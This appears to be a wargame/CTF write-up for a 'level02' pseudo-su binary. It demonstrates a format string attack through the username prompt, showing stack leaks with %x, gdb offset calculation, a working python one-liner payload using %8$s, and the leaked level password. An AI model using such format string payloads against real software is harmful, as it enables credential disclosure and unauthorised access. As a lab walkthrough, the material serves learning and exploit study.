## level02

We have here a program that comports as a pseudo su for level03  
It takes a login and a password, then open /bin/sh if the password is the good one  

At first place, buffers seems more or less well managed, and it seems there is no way to overflow.  

But on the last error message, there is a printf that takes as first arg an user input, so we can make a string format attack.

```bash
$> ./level02
    ...
    --[ Username: %x %x %x %x %x %x %x %x %x %x
    --[ Password: AAAA
    *****************************************
    ffffe500 0 41 2a2a2a2a 2a2a2a2a ffffe6f8 f7ff9a08 41414141

    --[ Username: %8$x
    --[ Password: AAAA
    *****************************************
    41414141
```

We found our typed password as 8$ printf's arguments, let's just store there the address of the buffer where the real password is stored

### Get EBP's address  

```bash
(gdb) b *main+4
...
(gdb) x/s $rbp
0x7fffffffe5d0:	 "" # ebp's address
```

### Get buffer's correct offset on the stack from ebp.  

> 0x7fffffffe5d0 - 0x80 (128) = 0x7fffffffe550
- 0x7fffffffe5d0
> EBP's address
- 0x80  
> 12 (main+11/17) + 112 (buffer 1 size) + 4 (main+49) = 128

### Final string

```bash
$> python -c 'print "%8$s" ; print "\x50\xe5\xff\xff\xff\x7f\x00\x00"' | ./level02 
    ===== [ Secure Access System v1.0 ] =====
    /***************************************\
    | You must login to access this system. |
    \**************************************/
    --[ Username: --[ Password: *****************************************
    Hh74RPnuQ9sa5JAEXgNWCqz7sXGnh5J5M9KfPg3H does not have access!
```

Thanks bro'

```bash
$> ./level02
    --[ Username: Hey
    --[ Password: Hh74RPnuQ9sa5JAEXgNWCqz7sXGnh5J5M9KfPg3H
$> # We won
```
